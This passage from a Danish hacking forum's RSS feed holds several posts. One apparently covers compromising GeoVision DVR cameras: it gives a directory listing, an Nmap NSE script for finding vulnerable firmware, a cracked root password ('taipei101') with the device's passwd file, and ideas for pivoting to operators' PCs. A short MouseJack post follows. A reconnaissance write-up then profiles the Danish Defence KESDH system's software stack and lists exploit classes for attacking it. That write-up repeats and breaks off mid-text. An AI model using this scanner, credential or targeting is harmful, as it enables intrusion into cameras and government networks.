18-09-2009  07:26               157 NetChgFix.htm<br />
18-09-2009  07:26               133 NetChgTmp.htm<br />
18-09-2009  07:26             2.176 NetStatus.htm<br />
18-09-2009  07:26             7.365 NetworkSetting.htm<br />
18-09-2009  07:26             4.451 NvrSetting.htm<br />
18-09-2009  07:26               305 NvrStatus.htm<br />
03-05-2010  03:30             7.284 PrivacyMask.htm<br />
03-05-2010  03:29             6.684 PtzSetting.htm<br />
18-09-2009  07:26               940 Rebooting.htm<br />
18-09-2009  07:26             1.759 RecStatus.htm<br />
12-03-2010  08:28             4.040 ReLogin.htm<br />
18-09-2009  07:26             7.006 SmtpSetting.htm<br />
18-09-2009  07:26             1.252 StreamSetting.htm<br />
18-09-2009  07:26             2.782 SysCfg.htm<br />
18-09-2009  07:26             1.423 SysLog.htm<br />
18-09-2009  07:26               836 SysReboot.htm<br />
18-09-2009  07:26               683 TestDhcp.htm<br />
18-09-2009  07:26               687 TestDhcpWire.htm<br />
18-09-2009  07:26               687 TestDhcpWlan.htm<br />
18-09-2009  07:26             1.067 UpnpSetting.htm<br />
18-09-2009  07:26               560 UserPwdErr.htm<br />
18-09-2009  07:26             7.464 UserSetting.htm<br />
03-05-2010  03:28            13.141 VideoServer.htm<br />
18-09-2009  07:26            28.565 VideoSetting.htm<br />
18-09-2009  07:26             2.427 VlsSetting.htm<br />
18-09-2009  07:26             9.061 VsmSetting.htm<br />
18-09-2009  07:26               305 VsmStatus.htm<br />
18-09-2009  07:26               858 WaitNetChg.htm<br />
18-09-2009  07:26             4.476 WeignSetting.htm<br />
18-09-2009  07:26             7.345 Wireless.htm<br />
18-09-2009  07:26             3.093 WlanScan.htm<br />
              82 File(s)        357.469 bytes<br />
               0 Dir(s)   1.596.698.624 bytes free<br />
<br />
F:\www2&gt;<br />
<br />
</div></div>
Søger man på GeoVision på Shodan, dukker der en god portion enheder op. <br />
<a href="https://www.shodan.io/search?query=geovision" target="_blank" rel="noopener" class="mycode_url">https://www.shodan.io/search?query=geovision</a><br />
Google Dorks giver kun en ubetydelig mængde. Hverken Google eller Shodan viser den reelle mængde enheder, så jeg har lavet et lille NSE script til Nmap, som bruger &lt;title&gt; tagget i kildekoden til at finde frem til de sårbare fimwares, samt response-headers til at finde en anden type firmware, som er den type jeg vil kigge på næste gang. De nyere versioner bruger tHTTPd som server-software, hvorimod de ældre versioner bruger GeoHttpServer. Eller måske bruges de til forskelligt hardware? hmm? <br />
Stilen af de forskellige firmwares kan ses i manualer for versionerne 8.12-8.x og de individuelle kameraer og videokort. <br />
<br />
vGeo.nse<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>-- Head --<br />
description = [[GeoVision DVR FW-FP]]<br />
author = "MXI"<br />
<br />
<br />
local shortport = require "shortport"<br />
local http = require "http"<br />
local string = require "string"<br />
<br />
<br />
-- Rule --<br />
portrule = shortport.http<br />
<br />
-- Action --<br />
action = function(host, port)<br />
    <br />
    local index = "/index.htm"<br />
    local uagent = {header={}}<br />
    uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"<br />
    local response = http.get(host, port, index, uagent)<br />
    <br />
    if ( response.status == 200 ) then<br />
        local title = string.match(response.body, "&lt;[Tt][Ii][Tt][Ll][Ee][^&gt;]*&gt;([^&lt;]*)&lt;/[Tt][Ii][Tt][Ll][Ee]&gt;")<br />
                <br />
        if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then<br />
            return "GeoVision DVR: Saarbar?"<br />
        end    <br />
        <br />
        if ( response.header.server == 'GeoHttpServer' ) then<br />
            if ( title == "Login In" ) then<br />
            return "GeoVision Webcam"<br />
            else<br />
            return "GeoVision Server, men ukendt firmware"<br />
            end<br />
                        <br />
        end<br />
    end<br />
end</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/YrgT78q.png" alt="[Billede: YrgT78q.png]" class="mycode_img" /></div>
<br />
De to nyere firmwares jeg har testet har haft "GeoVision Inc. - *" i titlen, så det er den string der søges efter. Samt login-formen ser således ud:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/0uqB7K2.png" alt="[Billede: 0uqB7K2.png]" class="mycode_img" /></div>
<br />
<br />
De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke).<br />
<br />
Lidt forskellig klient-software kan findes på nedenstående ftp:<br />
<a href="http://ftp.geovision.tw/ftp/Eason/FTP.txt" target="_blank" rel="noopener" class="mycode_url">http://ftp.geovision.tw/ftp/Eason/FTP.txt</a><br />
<br />
<br />
Lige til sidst, så tillod jeg mig for sjovt at køre passwd-filen en tur igennem John, og uden hverken GPU eller en specielt stor password-liste, lykkedes det John at komme frem til følgende root-password(Ingen brug af shadow):<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Using default input encoding: UTF-8<br />
Loaded 1 password hash (md5crypt, crypt(3) &#36;1&#36; [MD5 128/128 XOP 4x2])<br />
Press 'q' or Ctrl-C to abort, almost any other key for status<br />
<span style="font-weight: bold;" class="mycode_b">taipei101</span>        (root)<br />
1g 0:00:00:37 DONE (2016-03-12 21:51) 0.02649g/s 32856p/s 32856c/s 32856C/s taipei101..taiohi1<br />
Use the "--show" option to display all of the cracked passwords reliably<br />
Session completed<br />
<br />
<br />
<br />
root:&#36;1&#36;&#36;2CCpv4DCVCwkFXJ56NsuF0:0:0:root:/root:/bin/sh<br />
bin:*:1:1:bin:/bin:/bin/sh<br />
daemon:*:2:2:daemon:/usr/sbin:/bin/sh<br />
sys:*:3:3:sys:/dev:/bin/sh<br />
sync:*:4:100:sync:/bin:/bin/sync<br />
ftp:*:14:50:FTP User:/var/ftp:<br />
apache:x:48:48:Apache:/var/www:/sbin/nologin<br />
postfix:x:89:89::/var/spool/postfix:/sbin/nologin<br />
nobody:*:65534:65534:nobody:/tmp:/bin/sh<br />
guest::65534:65534:guest:/home/guest:/bin/sh<br />
admin:x:500:65535:Linux User,,,:/tmp:/bin/sh<br />
videoserver:x:500:65535:Linux User,,,:/tmp:/bin/sh</blockquote>
<br />
<br />
Det ser ikke ud til at være blevet delt før, og ved en simpel Google-søgning er der heller ikke meget at hente udover Taipei og Taipei 101. Dog ikke noget password-relateret.<br />
Nu har jeg ikke tænkt mig at kigge nærmere på lige netop denne firmware, da jeg for at finde den rigtige version, er nødsaget til at - manuelt(Captcha - kunne måske bruge en solver), udpakke og greppe efter server-software samt en specifikt titel. Det er slet ikke besværligt, men tager sgu lidt tid. <br />
<br />
Root-passwordet kan i realiteten bruges til hvis man finder yderligere en sårbarhed, såsom noget command injection, telnet-aktivering, code execution osv. som ikke allerede kører som root.<br />
Et sjovt eksempel ville være at inficere den software der står for installation af de drivers der skal bruges for at håndtere forbindelsen til selve kameraerne.<br />
Herefter kan man tvinge endnu en installation, og få adgang til 'overvågerens' PC. Det er måske lidt overkill, men det er en lidt 'sej' måde at opnå pivoting/lateral movement på. <br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/j5eJAXP.png" alt="[Billede: j5eJAXP.png]" class="mycode_img" /></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Mousejack]]></title>
			<link>https://www.shellsec.pw/traad-mousejack</link>
			<pubDate>Wed, 09 Mar 2016 21:11:53 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-mousejack</guid>
			<description><![CDATA[<iframe width="560" height="315" src="https://www.youtube.com/embed/3NL2lEomB_Y" frameborder="0" allowfullscreen></iframe><br />
<br />
MouseJack whitepaper – <a href="https://github.com/RFStorm/mousejack/blob/master/doc/pdf/MouseJack-whitepaper-v1.1.pdf" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack/blo...r-v1.1.pdf</a><br />
Firmware and research tools – <a href="https://github.com/RFStorm/mousejack" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack</a><br />
<br />
Er jeg den eneste får lyst til at hoppe på ebay og købe billig Crazyradio bare for at lege med det? (er klar over det ikke er al den nødvendlig kode der er tilgængelig)<br />
Nogen der har hørt/læst yderligere eller set en POC på det?]]></description>
			<content:encoded><![CDATA[<iframe width="560" height="315" src="https://www.youtube.com/embed/3NL2lEomB_Y" frameborder="0" allowfullscreen></iframe><br />
<br />
MouseJack whitepaper – <a href="https://github.com/RFStorm/mousejack/blob/master/doc/pdf/MouseJack-whitepaper-v1.1.pdf" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack/blo...r-v1.1.pdf</a><br />
Firmware and research tools – <a href="https://github.com/RFStorm/mousejack" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack</a><br />
<br />
Er jeg den eneste får lyst til at hoppe på ebay og købe billig Crazyradio bare for at lege med det? (er klar over det ikke er al den nødvendlig kode der er tilgængelig)<br />
Nogen der har hørt/læst yderligere eller set en POC på det?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[KESDH Whitehat Footprinting]]></title>
			<link>https://www.shellsec.pw/traad-kesdh-whitehat-footprinting</link>
			<pubDate>Fri, 04 Mar 2016 15:58:39 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-kesdh-whitehat-footprinting</guid>
			<description><![CDATA[Tænkte det kunne være meget sjovt at dele, hvad man kan finde af offentlige informationer, på et system som man rent praktisk ville kunne bruge til lateral movement/pivoting i et relativt HP netværk.<br />
Det er alt sammen offentligt information, som jeg har fundet her i eftermiddags, og der er derfor ikke anvendt portscanning eller andre mere lyssky metoder.<br />
Jeg siger ikke denne information skulle være hemmeligholdt, jeg siger bare at det er meget værdifuldt for en person, som af en eller anden grund har sat sig i hovedet at skulle have uautoriseret adgang til forsvarets systemer. Jeg tvivler også på, at det rent faktisk er noget folk kan bruge til noget.<br />
Desuden skriver jeg på samme tid som jeg læser mig frem, så jeg forbeholder mig retten til fejl og rettelser. I realiteten kan det jeg skriver også være urigtigt og fejlfortolket. Det er op til jer, der rent faktisk læser, at bedømme det. Der bliver ikke anvendt 1337 H3xx00ring, kun lidt Google.<br />
<br />
<br />
Jeg læste nedenstående artikel på v2, og bed mærke i følgende citat:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Forsvarets nuværende KESDH-system baseret på Captia blev lanceret i 2009 og kostede samlet Forsvaret omkring 200 millioner kroner.<br />
<br />
Det varede dog ikke længe, før systemet blev forældet på grund af en gammel infrastruktur, der bandt Forsvaret til en ældre versioner af <span style="font-weight: bold;" class="mycode_b">Windows, Microsoft Office og Internet Explorer.</span> Det vil derfor stadig ikke være muligt for Forsvaret at opgradere til <span style="font-weight: bold;" class="mycode_b">Office 2010</span> og nyere, før det nye ESDH-system kommer op at køre i slutningen af i år.<br />
...................<br />
...............<br />
...........<br />
.......<br />
Opgraderingen af systemet gør også op med en lang række besværlige arbejdsgange i Forsvaret. Blandt andet understøtter systemet kun weblogin ved den gamle udgave af <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span>, hvilket gør login fra mobile enheder stort set umuligt.</blockquote>
<a href="http://www.version2.dk/artikel/forsvaret-dropper-csc-it-udbud-til-flere-hundrede-millioner-kroner-var-alligevel-ikke-spil" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...-ikke-spil</a><br />
<br />
Hvorvidt det er Captia eller styresystemet selv der resulterer i denne begrænsning ved jeg ikke, men las os for en god ordens skyld have følgende information i baghovedet:<br />
<span style="font-weight: bold;" class="mycode_b">Windows 7</span> er fra år <span style="text-decoration: underline;" class="mycode_u">2009</span>, og installeres med <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span>.<br />
Seneste version af <span style="font-weight: bold;" class="mycode_b">Internet Explorer</span> til <span style="text-decoration: underline;" class="mycode_u">Windows XP</span> er <span style="font-weight: bold;" class="mycode_b">8</span>.<br />
<a href="http://windows.microsoft.com/da-dk/internet-explorer/which-version-am-i-using#ie=other" target="_blank" rel="noopener" class="mycode_url">http://windows.microsoft.com/da-dk/inter...g#ie=other</a><br />
<a href="https://en.wikipedia.org/wiki/Microsoft_Windows#Windows_Vista" target="_blank" rel="noopener" class="mycode_url">https://en.wikipedia.org/wiki/Microsoft_...dows_Vista</a><br />
<br />
Samt systemkravene til <span style="text-decoration: underline;" class="mycode_u">Internet Explorer 8</span>, da man aldrig ved om de har downgraded:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Availability of Windows Internet Explorer 8</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">System requirements </span><br />
Internet Explorer 8 runs on any of the following operating systems:<ul class="mycode_list"><li>Windows 7, 32-bit versions<br />
</li>
<li>Windows 7, 64-bit versions<br />
</li>
<li>Windows Vista, 32-bit versions<br />
</li>
<li>Windows Vista, 64-bit versions<br />
</li>
<li>Windows Vista with Service Pack 1 (SP 1) or a later version<br />
</li>
<li>Windows XP, 32-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows XP Professional, 64-bit Edition<br />
</li>
<li>Windows Server 2003, 32-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows Server 2003, 64-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows Server 2008, 32-bit, or a later version<br />
</li>
<li>Windows Server 2008, 64-bit, or a later version <br />
</li>
</ul>
</blockquote>
<a href="https://support.microsoft.com/da-dk/kb/944036" target="_blank" rel="noopener" class="mycode_url">https://support.microsoft.com/da-dk/kb/944036</a><br />
<br />
Af nyere versioner burde vi altså at kunne udelukke <span style="font-weight: bold;" class="mycode_b">Windows 8, 8.1 og 10</span>.<br />
<br />
Der blev også nævnt en forældet Office version, og denne ældre artikel fra v2, skrev i 2014 følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Det er kun lidt over fem år siden, at Forsvaret fik implementeret dets nuværende ESDH-system fra ScanJour i starten af 2009. Systemet kostede samlet omkring 200 mio. kr., men blev hurtigt forældet, da det eksempelvis ikke understøttede <span style="font-weight: bold;" class="mycode_b">Microsoft Office 2010</span></blockquote>
<br />
<a href="http://www.version2.dk/artikel/forsvaret-skal-opgradere-foraeldet-it-system-op-mod-400-mio-kr-68461" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...o-kr-68461</a><br />
<br />
Hmm. Hvis vi nu kigger på systemkravene til <span style="text-decoration: underline;" class="mycode_u">Office 2010 Standart</span>, ser vi følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">Supports only the 32-bit edition of Office 2010: </span><ul class="mycode_list"><li>Windows XP with Service Pack 3 (SP3)<br />
</li>
<li>Windows Server 2003 Service Pack 2 (SP2), MSXML 6.0<br />
</li>
<li>Windows Server 2003 R2<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Supports both 32-bit or 64-bit editions of Office 2010:</span><ul class="mycode_list"><li>Windows Vista with Service Pack 1 (SP1)<br />
</li>
<li>Windows 7<br />
</li>
<li>Windows 8<br />
</li>
<li>Windows Server 2008<br />
</li>
<li>Windows Server 2008 Service Pack 2 (SP2)<br />
</li>
<li>Windows Server 2008 R2<br />
</li>
<li>Windows Server 2008 R2 Service Pack 1 (SP1)<br />
</li>
<li>Windows Server 2012<br />
</li>
<li>Terminal Server<br />
</li>
<li>Windows on Windows (WOW) which allows installation of 32-bit versions of Office 2010 on 64-bit operating systems, excluding Windows Server 2003, 64-bit and Windows XP, 64-bit.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Doesn't support any edition of Office 2010:</span><ul class="mycode_list"><li>Windows Server 2003, 64-bit<br />
</li>
<li>Windows XP, 64-bit<br />
</li>
</ul>
</blockquote>
<a href="https://technet.microsoft.com/en-us/library/ee624351.aspx%28v=office.14%29" target="_blank" rel="noopener" class="mycode_url">https://technet.microsoft.com/en-us/libr...fice.14%29</a><br />
<br />
Som jeg ser det, ser Office ud til at være godt understøttet, lige med undtagelse af <span style="font-weight: bold;" class="mycode_b">Windows 2003/XP x64</span>. <br />
Det er dog en alt for løs antagelse, så lad os kigge lidt videre.<br />
<br />
Ved en Google-søgning fandt jeg følgende: <a href="http://medarbejdere.au.dk/search/all/?q=captia" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/search/all/?q=captia</a><br />
Som sagt er KESDH baseret på Captia, så det kan ikke undgås at der må være nogle ligheder.<br />
Her ses Captias installation på en <span style="font-weight: bold;" class="mycode_b">Windows 7 x64-maskine</span>, men det er stadig for løst, og vi ved jo ikke hvilken version der er omtalt:<br />
<a href="http://medarbejdere.au.dk/administration/hr/hr-systemer/esdh-systemet-captia/faq-tekniske-problemer-i-captia/installation/" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/administration...tallation/</a><br />
<br />
Der er flere vejledninger og dokumenter på Århus Universitets hjemmeside, men vi går i stedet direkte til kilden, scanjours.dk.<br />
Her kan vi se at der er dokumentation for 2 versioner,<span style="text-decoration: underline;" class="mycode_u"> 4.5SP4 og 3.0SP9</span>.<br />
<a href="http://www.scanjour.dk/support/dokumentation-captia/" target="_blank" rel="noopener" class="mycode_url">http://www.scanjour.dk/support/dokumentation-captia/</a><br />
<br />
Hvis vi <span style="font-family: Times New Roman;" class="mycode_font">kigger</span> på Support matrix PDF-filen, kan vi se at v4.5 understøtter både <span style="font-weight: bold;" class="mycode_b">Internet Explorer 9</span> og <span style="font-weight: bold;" class="mycode_b">Office 2010</span>, begge i <span style="font-weight: bold;" class="mycode_b">x86</span>.<br />
Lad os i stedet gå til fanen for v3.0, og kigge på dennes tilhørende Support matrix PDF-fil.<br />
Her er de seneste understøttede versioner af <span style="font-weight: bold;" class="mycode_b">Windows, Internet Explorer</span> og <span style="font-weight: bold;" class="mycode_b">Office</span>, henholdsvis <span style="text-decoration: underline;" class="mycode_u">7</span>, <span style="text-decoration: underline;" class="mycode_u">8</span> og <span style="text-decoration: underline;" class="mycode_u">2007</span>.<br />
<br />
<br />
Vi nærmer os noget brugbart information her, og et par Google-søgninger senere, kommer vi frem til et dokument fra Klagenævnet for Udbud, fra erhvervsstyrelsens hjemmeside:<br />
<a href="https://erhvervsstyrelsen.dk/sites/default/files/media/udbud/csc_danmark_as_mod_forsvarsministeriet_v_forsvarets_koncernfaelles_informatiktjeneste_fkit.pdf" target="_blank" rel="noopener" class="mycode_url">https://erhvervsstyrelsen.dk/sites/defau...e_fkit.pdf</a><br />
<br />
Denne sag omhandler udbuddet af det nye it-system, og CSC der mener at KMD har haft en fordel, grundet deres opkøb af ScanJours blah blah blah..<br />
I dokumentet kan vi igen læse om problematikken med forældede versioner af Windows, Office og IE, som ikke kan opdateret ved brug af systemer.<br />
<br />
Desuden ser vi følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Den nuværende KESDH-løsning har været i drift siden primo 2009. Så-vel  servere  som  styreprogrammel  mv.  er  nu  utidssvarende  og  udgør  en ”brændende platform” i relation til opretholdelse af driften af KESDH.Således vurderer FKIT, at (a) der er en høj og stigende risiko for fatalenedbrud  som  følge  af  hardware  fejl,  og  (b)  der  er  en  reel  og  stigendesandsynlighed  for,  at  nødvendigt  reserveudstyr,  ikke  kan  fremskaffes. Derudover  afvikles  KESDH  på  en  driftsplatform  bl.a.  bestående  af <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Windows 2003</span></span> servere, som Microsoft ophører med at supportere fra ogmed den 14. juli 2015. Hertil kommer, at den bestående driftsplatform  ikke  muliggør,  at  derkan opgraderes fra <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Captia version 3.0</span></span> til den seneste <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Captia version 4.7</span></span></blockquote>
<br />
<span style="font-size: xx-large;" class="mycode_size"><span style="font-size: xx-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><span style="font-size: xx-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><span style="font-size: xx-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size">Det stemmer også over ens med nogle af de ting vi fandt tidligere, og vi kan hermed konkludere, at forsvarets IT-sagsbehandlingsprogram, KESDH, højst sandsynligt kører på et system der repræsenterer nedenstående, med mulighed for variationer:<br />
- <span style="font-weight: bold;" class="mycode_b">Windows Server 2003</span><br />
- <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span><br />
- Office 2003/<span style="font-weight: bold;" class="mycode_b">2007</span></span></span></span></span></span></span></span></span><br />
<br />
Hvis man leder efter et fodfæste, som eventuelt ville kunne resultere i dybere adgang til et netværk, er denne form for information yderst værdifuld, da man her kan begynde planlægningen af et angreb, som i dette tilfælde nu kan inkludere: <br />
- Server 2003 exploits<br />
- Internet Explorer RCE drive-bys<br />
- Office 2007 exploits<br />
<br />
Om de bruger Office direkte, eller om det er integreret i deres system ved jeg ikke, men der er massere af dokumentation hvis man vil gå i dybden med det. <br />
<br />
Nu ville det så være tid til at finde de nævnte servere, og skanne for porte og services, for at få en bedre forståelse for deres infrastruktur, samt finde yderligere angrebs-vektorer.]]></description>
			<content:encoded><![CDATA[Tænkte det kunne være meget sjovt at dele, hvad man kan finde af offentlige informationer, på et system som man rent praktisk ville kunne bruge til lateral movement/pivoting i et relativt HP netværk.<br />
Det er alt sammen offentligt information, som jeg har fundet her i eftermiddags, og der er derfor ikke anvendt portscanning eller andre mere lyssky metoder.<br />
Jeg siger ikke denne information skulle være hemmeligholdt, jeg siger bare at det er meget værdifuldt for en person, som af en eller anden grund har sat sig i hovedet at skulle have uautoriseret adgang til forsvarets systemer. Jeg tvivler også på, at det rent faktisk er noget folk kan bruge til noget.<br />
Desuden skriver jeg på samme tid som jeg læser mig frem, så jeg forbeholder mig retten til fejl og rettelser. I realiteten kan det jeg skriver også være urigtigt og fejlfortolket. Det er op til jer, der rent faktisk læser, at bedømme det. Der bliver ikke anvendt 1337 H3xx00ring, kun lidt Google.<br />
<br />
<br />
Jeg læste nedenstående artikel på v2, og bed mærke i følgende citat:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Forsvarets nuværende KESDH-system baseret på Captia blev lanceret i 2009 og kostede samlet Forsvaret omkring 200 millioner kroner.<br />
<br />
Det varede dog ikke længe, før systemet blev forældet på grund af en gammel infrastruktur, der bandt Forsvaret til en ældre versioner af <span style="font-weight: bold;" class="mycode_b">Windows, Microsoft Office og Internet Explorer.</span> Det vil derfor stadig ikke være muligt for Forsvaret at opgradere til <span style="font-weight: bold;" class="mycode_b">Office 2010</span> og nyere, før det nye ESDH-system kommer op at køre i slutningen af i år.<br />
...................<br />
...............<br />
...........<br />
.......<br />
Opgraderingen af systemet gør også op med en lang række besværlige arbejdsgange i Forsvaret. Blandt andet understøtter systemet kun weblogin ved den gamle udgave af <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span>, hvilket gør login fra mobile enheder stort set umuligt.</blockquote>
<a href="http://www.version2.dk/artikel/forsvaret-dropper-csc-it-udbud-til-flere-hundrede-millioner-kroner-var-alligevel-ikke-spil" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...-ikke-spil</a><br />
<br />
Hvorvidt det er Captia eller styresystemet selv der resulterer i denne begrænsning ved jeg ikke, men las os for en god ordens skyld have følgende information i baghovedet:<br />
<span style="font-weight: bold;" class="mycode_b">Windows 7</span> er fra år <span style="text-decoration: underline;" class="mycode_u">2009</span>, og installeres med <span style="font-weight: bold;" class="mycode_b">Internet Explorer 8</span>.<br />
Seneste version af <span style="font-weight: bold;" class="mycode_b">Internet Explorer</span> til <span style="text-decoration: underline;" class="mycode_u">Windows XP</span> er <span style="font-weight: bold;" class="mycode_b">8</span>.<br />
<a href="http://windows.microsoft.com/da-dk/internet-explorer/which-version-am-i-using#ie=other" target="_blank" rel="noopener" class="mycode_url">http://windows.microsoft.com/da-dk/inter...g#ie=other</a><br />
<a href="https://en.wikipedia.org/wiki/Microsoft_Windows#Windows_Vista" target="_blank" rel="noopener" class="mycode_url">https://en.wikipedia.org/wiki/Microsoft_...dows_Vista</a><br />
<br />
Samt systemkravene til <span style="text-decoration: underline;" class="mycode_u">Internet Explorer 8</span>, da man aldrig ved om de har downgraded:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Availability of Windows Internet Explorer 8</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">System requirements </span><br />
Internet Explorer 8 runs on any of the following operating systems:<ul class="mycode_list"><li>Windows 7, 32-bit versions<br />
</li>
<li>Windows 7, 64-bit versions<br />
</li>
<li>Windows Vista, 32-bit versions<br />
</li>
<li>Windows Vista, 64-bit versions<br />
</li>
<li>Windows Vista with Service Pack 1 (SP 1) or a later version<br />
</li>
<li>Windows XP, 32-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows XP Professional, 64-bit Edition<br />
</li>
<li>Windows Server 2003, 32-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows Server 2003, 64-bit versions with Service Pack 2 (SP2) or a later version<br />
</li>
<li>Windows Server 2008, 32-bit, or a later version<br />
</li>
<li>Windows Server 2008, 64-bit, or a later version <br />
</li>
</ul>
</blockquote>
<a href="https://support.microsoft.com/da-dk/kb/944036" target="_blank" rel="noopener" class="mycode_url">https://support.microsoft.com/da-dk/kb/944036</a><br />
<br />
Af nyere versioner burde vi altså at kunne udelukke <span style="font-weight: bold;" class="mycode_b">Windows 8, 8.1 og 10</span>.<br />
<br />
Der blev også nævnt en forældet Office version, og denne ældre artikel fra v2, skrev i 2014 følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Det er kun lidt over fem år siden, at Forsvaret fik implementeret dets nuværende ESDH-system fra ScanJour i starten af 2009. Systemet kostede samlet omkring 200 mio. kr., men blev hurtigt forældet, da det eksempelvis ikke understøttede <span style="font-weight: bold;" class="mycode_b">Microsoft Office 2010</span></blockquote>
<br />
<a href="http://www.version2.dk/artikel/forsvaret-skal-opgradere-foraeldet-it-system-op-mod-400-mio-kr-68461" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...o-kr-68461</a><br />
<br />
Hmm. Hvis vi nu kigger på systemkravene til <span style="text-decoration: underline;" class="mycode_u">Office 2010 Standart</span>, ser vi følgende:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">Supports only the 32-bit edition of Office 2010: </span><ul class="mycode_list"><li>Windows XP with Service Pack 3 (SP3)<br />
</li>
<li>Windows Server 2003 Service Pack 2 (SP2), MSXML 6.0<br />
</li>
<li>Windows Server 2003 R2<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Supports both 32-bit or 64-bit editions of Office 2010:</span><ul class="mycode_list"><li>Windows Vista with Service Pack 1 (SP1)<br />
</li>
<li>Windows 7<br />
</li>
<li>Windows 8<br />
</li>
<li>Windows Server 2008<br />
</li>
<li>Windows Server 2008 Service Pack 2 (SP2)<br />
</li>
<li>Windows Server 2008 R2<br />
</li>
<li>Windows Server 2008 R2 Service Pack 1 (SP1)<br />
</li>
<li>Windows Server 2012<br />
</li>
<li>Terminal Server<br />
</li>
<li>Windows on Windows (WOW) which allows installation of 32-bit versions of Office 2010 on 64-bit operating systems, excluding Windows Server 2003, 64-bit and Windows XP, 64-bit.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Doesn't support any edition of Office 2010:</span><ul class="mycode_list"><li>Windows Server 2003, 64-bit<br />
</li>
<li>Windows XP, 64-bit<br />
</li>
</ul>
</blockquote>
<a href="https://technet.microsoft.com/en-us/library/ee624351.aspx%28v=office.14%29" target="_blank" rel="noopener" class="mycode_url">https://technet.microsoft.com/en-us/libr...fice.14%29</a><br />
<br />
Som jeg ser det, ser Office ud til at være godt understøttet, lige med undtagelse af <span style="font-weight: bold;" class="mycode_b">Windows 2003/XP x64</span>. <br />
Det er dog en alt for løs antagelse, så lad os kigge lidt videre.<br />
<br />
Ved en Google-søgning fandt jeg følgende: <a href="http://medarbejdere.au.dk/search/all/?q=captia" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/search/all/?q=captia</a><br />
Som sagt er KESDH baseret på Captia, så det kan ikke undgås at der må være nogle ligheder.<br />
Her ses Captias installation på en <span style="font-weight: bold;" class="mycode_b">Windows 7 x64-maskine</span>, men det er stadig for løst, og vi ved jo ikke hvilken version der er omtalt:<br />
<a href="http://medarbejdere.au.dk/administration/hr/hr-systemer/esdh-systemet-captia/faq-tekniske-problemer-i-captia/installation/" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/administration...tallation/</a><br />
<br />
Der er flere vejledninger og dokumenter på Århus Universitets hjemmeside, men vi går i stedet direkte til kilden, scanjours.dk.<br />
Her kan vi se at der er dokumentation for 2 versioner,<span style="text-decoration: underline;" class="mycode_u"> 4.5SP4 og 3.0SP9</span>.<br />
<a href="http://www.scanjour.dk/support/dokumentation-captia/" target="_blank" rel="noopener" class="mycode_url">http://www.scanjour.dk/support/dokumentation-captia/</a><br />
<br />
